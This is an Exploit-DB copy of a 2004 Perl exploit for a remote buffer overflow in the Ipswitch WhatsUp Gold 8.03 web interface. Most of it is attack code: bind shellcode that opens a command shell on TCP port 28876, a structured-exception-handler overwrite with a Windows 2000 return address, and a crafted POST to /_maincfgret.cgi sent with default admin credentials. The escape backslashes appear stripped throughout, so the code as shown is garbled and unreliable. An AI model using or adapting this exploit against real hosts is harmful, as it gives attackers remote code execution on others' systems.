https://www.exploit-db.com/exploits/24572

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/11109/info

The Ipswitch WhatsUp Gold web interface is prone to a remotely exploitable buffer overflow vulnerability. This may be exploited by authenticated users of the interface to execute arbitrary code in the context of the program.

#!/usr/bin/perl 
#  [LoWNOISE] NotmuchG.pl  v.1.5
# ================================================
#  IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE  Colombia 
# et(at)cyberspace.org
# Oct/2004
# 
# Tested on WIN2K SP4 
#
# The exploit takes control by overwriting the pointer of a Structured Exception Handler, 
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an exception that can
# be manipulated by changing the SEH pointer (ret [815]).
# 
#
# Bug Discovered by 
# iDEFENSE  Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,Ritt3r,Mav, f4lc0n.. 

use strict; 
use IO::Socket::INET;

usage() unless (@ARGV == 2); 

my $host = shift(@ARGV); 
my $port = shift(@ARGV); 

# Bind shellcode port 28876  (HDM,  metasploit.org)
my $shellcode =
"xebx43x56x57x8bx45x3cx8bx54x05x78x01xeax52x8bx52". 
"x20x01xeax31xc0x31xc9x41x8bx34x8ax01xeex31xffxc1". 
"xcfx13xacx01xc7x85xc0x75xf6x39xdfx75xeax5ax8bx5a". 
"x24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01". 
"xe8x5fx5exffxe0xfcx31xc0x64x8bx40x30x8bx40x0cx8b". 
"x70x1cxadx8bx68x08x31xc0x66xb8x6cx6cx50x68x33x32". 
"x2ex64x68x77x73x32x5fx54xbbx71xa7xe8xfexe8x90xff". 
"xffxffx89xefx89xc5x81xc4x70xfexffxffx54x31xc0xfe". 
"xc4x40x50xbbx22x7dxabx7dxe8x75xffxffxffx31xc0x50". 
"x50x50x50x40x50x40x50xbbxa6x55x34x79xe8x61xffxff". 
"xffx89xc6x31xc0x50x50x35x02x01x70xccxfexccx50x89". 
"xe0x50x6ax10x50x56xbbx81xb4x2cxbexe8x42xffxffxff". 
"x31xc0x50x56xbbxd3xfax58x9bxe8x34xffxffxffx58x6a". 
"x10x54x50x56xbbx47xf3x56xc6xe8x24xffxffxffx31xdb". 
"x53x68x2ex63x6dx64x89xe1x41x50x50x50x53x53x31xc0". 
"xfexc4x40x50x53x53x53x53x53x53x53x53x53x53x6ax44". 
"x89xe6x50x55x53x53x53x53x54x56x53x53x53x43x53x4b". 
"x53x53x51x53x89xfdxbbx21xd0x05xd0xe8xe2xfexffxff". 
"x31xc0x48x8bx44x24x04xbbx43xcbx8dx5fxe8xd1xfexff". 
"xffx5dx5dx5dxbbx12x6bx6dxd0xe8xc4xfexffxffx31xc0". 
"x50x89xfdxbbx69x1dx42x3axe8xb5xfexffxff"; 

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port); 
$socket or die "Cannot connect to the host.n"; 

$socket->autoflush(1); 

print $socket "POST /_maincfgret.cgi HTTP/1.0rn"; 
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*rn"; 
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=endrn"; 
print $socket "Accept-Language: en-usrnContent-Type:
application/x-www-form-urlencodedrnConnection: Keep-Alivern";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)rn";
print $socket "Host: 127.0.0.1rnContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";


#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]

$cmd .= "A"x811; #815 -4 
$cmd .= "xebx06x90x90"; #jumper <eb + 06> <garbage> jmp to shellcode


#$cmd .= "xfex63xa1x71"; #winXP SP1 ws2help.dll
$cmd .= "xc4x2ax02x75";  #win2k sp0-sp4 ws2help.dll

#$cmd .= "LOWNOISE";        #garbage :D 
$cmd .= "x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura

$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."rnPragma: no-cachernAuthorization: Basic
YWRtaW46YWRtaW4=rnrn";
print $socket $cmd."rn";

close($socket); 
exit(0); 

sub usage 
{ 
print "n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploitn";
print "===================================================n";
print "nUsage: NotmuchG.pl [host] [port]n"; 
print "[host]  Target hostn[port]  WhatsUp webserver portnn"; 
print "n Shell on tcp port 28876.nn"; 
print "ET LoWNOISE 2004n";
exit(1); 
}